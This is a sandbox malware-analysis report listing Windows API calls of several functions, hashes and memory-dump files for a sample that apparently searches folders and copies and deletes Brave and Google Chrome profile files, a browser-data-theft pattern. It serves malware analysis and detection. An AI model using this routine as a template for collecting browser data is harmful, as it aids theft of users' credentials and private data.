                            • lstrlen.KERNEL32(00D91794), ref: 00D61909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61929
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61966
                            • lstrlen.KERNEL32(\*.*), ref: 00D61971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D6199A
                              • Part of subcall function 00D84040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00D8406D
                              • Part of subcall function 00D84040: lstrcpy.KERNEL32(00000000,?), ref: 00D840A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D619C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61A16
                            • lstrlen.KERNEL32(00D91794), ref: 00D61A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61A41
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61A81
                            • lstrlen.KERNEL32(00D91794), ref: 00D61A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61AAC
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D61B45
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D61B70
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D61B8A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61C03
                            • lstrlen.KERNEL32(00D91794), ref: 00D61C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61C31
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61C74
                            • lstrlen.KERNEL32(00D91794), ref: 00D61C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61CA2
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61CAE
                            • lstrlen.KERNEL32(?), ref: 00D61CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61CE9
                            • lstrlen.KERNEL32(00D91794), ref: 00D61CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61D14
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61DEB
                            • lstrlen.KERNEL32(00D91794), ref: 00D61DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61E19
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61E56
                            • lstrlen.KERNEL32(00D91794), ref: 00D61E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61E81
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61E8D
                            • lstrlen.KERNEL32(?), ref: 00D61E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D61F45
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61F9F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D61FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61FE3
                            • lstrlen.KERNEL32(00D91794), ref: 00D61FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6200E
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D62042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6204D
                            • lstrlen.KERNEL32(00D91794), ref: 00D62058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62075
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: 1f3015676520e07133c893e8c40a53adb4ca658b6a9e9a505dcd04d558e9039d
                            • Instruction ID: 51a94cfbfd5da5a846e78acc879e0b897e7f20d2d86504757bb58aa85969b6a8
                            • Opcode Fuzzy Hash: 1f3015676520e07133c893e8c40a53adb4ca658b6a9e9a505dcd04d558e9039d
                            • Instruction Fuzzy Hash: 7D927A35912A1A9BCB21EFA8DD89ABE77B9EF44300F0D4129F805A7211DB74DD45CBB0
                            Function 00D6DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DBEF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D6DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC17
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D6DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC4C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DC8F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D6DCD0
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D6DCF0
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D6DD0A
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D6DD1D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DD7B
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDA3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DDAF
                            • lstrlen.KERNEL32(?), ref: 00D6DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DE19
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DE6F
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DE7B
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DEBB
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DEE6
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DEF2
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFA5
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DFB1
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DFF4
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E022
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6E02E
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00D6E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00D6E0E7
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E11F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E19F
                            • lstrcat.KERNEL32(00000000), ref: 00D6E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E1F9
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E22F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E261
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D6E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 00D6E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00D6E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E349
                            • DeleteFileA.KERNEL32(?), ref: 00D6E381
                            • StrCmpCA.SHLWAPI(?,00BFCFD8), ref: 00D6E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E445
                            • StrCmpCA.SHLWAPI(?,00BF8F20), ref: 00D6E468
                            • StrCmpCA.SHLWAPI(?,00BF8E60), ref: 00D6E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D6E4E0
                            • StrCmpCA.SHLWAPI(?,00BFCF18), ref: 00D6E58E
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00D6E776
                            • DeleteFileA.KERNEL32(?), ref: 00D6E7D2
                            • StrCmpCA.SHLWAPI(?,00BF8F50), ref: 00D6E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E952
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: b6c66dde95eb9e8437488463d315e7d4bc38bd59de1baa05f42b1f7db613a1b2
                            • Instruction ID: 8f7a823cda390893aa10b43b653449dc30c9dbd6c375046e3b83013f7e234031
                            • Opcode Fuzzy Hash: b6c66dde95eb9e8437488463d315e7d4bc38bd59de1baa05f42b1f7db613a1b2
                            • Instruction Fuzzy Hash: 73926F75A1160A9FCB20EFB8DC89AAE77B9EF48300F094529F806D7251DB74DD458BB0
                            Function 00D718A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D718D2
                            • lstrlen.KERNEL32(\*.*), ref: 00D718DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D718FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D7190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D71947
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D71967
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71981
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D719BF
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D719F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71A4C
                            • lstrlen.KERNEL32(00D91794), ref: 00D71A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71A80
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71AB4
                            • lstrlen.KERNEL32(?), ref: 00D71AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B19
                            • lstrlen.KERNEL32(00BF8FD0), ref: 00D71B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B8F
                            • lstrlen.KERNEL32(00D91794), ref: 00D71BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71BC3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C57
                            • lstrlen.KERNEL32(00D91794), ref: 00D71C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C8B
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D21
                            • lstrlen.KERNEL32(00D91794), ref: 00D71D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D55
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71DED
                            • lstrlen.KERNEL32(00D91794), ref: 00D71E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71E36
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71E68
                            • lstrlen.KERNEL32(00BFCDB0), ref: 00D71E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71EB2
                            • lstrlen.KERNEL32(00D91794), ref: 00D71EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71EE3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F15
                            • lstrlen.KERNEL32(00BFDAE0), ref: 00D71F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F5F
                            • lstrlen.KERNEL32(00D91794), ref: 00D71F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F90
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71FC2
                            • lstrlen.KERNEL32(00BEBF88), ref: 00D71FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72036
                            • lstrlen.KERNEL32(00D91794), ref: 00D72048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72067
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D72073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72098
                            • lstrlen.KERNEL32(?), ref: 00D720AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D720D0
                            • lstrcat.KERNEL32(00000000,?), ref: 00D720DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72103
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7213F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D7214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: 73633d7ae48d3507857b5cb1ec367bf5ae252259bfcd82adc73a809768b9df34
                            • Instruction ID: 75a7009e862b578259aa6a6be218f8f29fbce06ae555a5a6a8359c7d18b21098
                            • Opcode Fuzzy Hash: 73633d7ae48d3507857b5cb1ec367bf5ae252259bfcd82adc73a809768b9df34
                            • Instruction Fuzzy Hash: 1562723591161A9BCB22EFA8CC49ABEB7B9FF44700F094129F80997251EB74DD45CBB0
                            Function 00D73910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00D7392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D73943
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7396C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D73986
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D739BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D739E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D739F2
                            • lstrlen.KERNEL32(00D91794), ref: 00D739FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A1A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73A26
                            • lstrlen.KERNEL32(?), ref: 00D73A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A8A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D73ACE
                            • lstrlen.KERNEL32(?), ref: 00D73AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B36
                            • lstrlen.KERNEL32(00D91794), ref: 00D73B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B6A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B9E
                            • lstrlen.KERNEL32(?), ref: 00D73BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73BE0
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D73C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73C3C
                            • lstrlen.KERNEL32(00BF8FD0), ref: 00D73C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73CB7
                            • lstrlen.KERNEL32(00D91794), ref: 00D73CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73CE8
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73D79
                            • lstrlen.KERNEL32(00D91794), ref: 00D73D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73DAD
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E43
                            • lstrlen.KERNEL32(00D91794), ref: 00D73E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E77
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F0D
                            • lstrlen.KERNEL32(00D91794), ref: 00D73F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F41
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F75
                            • lstrlen.KERNEL32(?), ref: 00D73F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73FE0
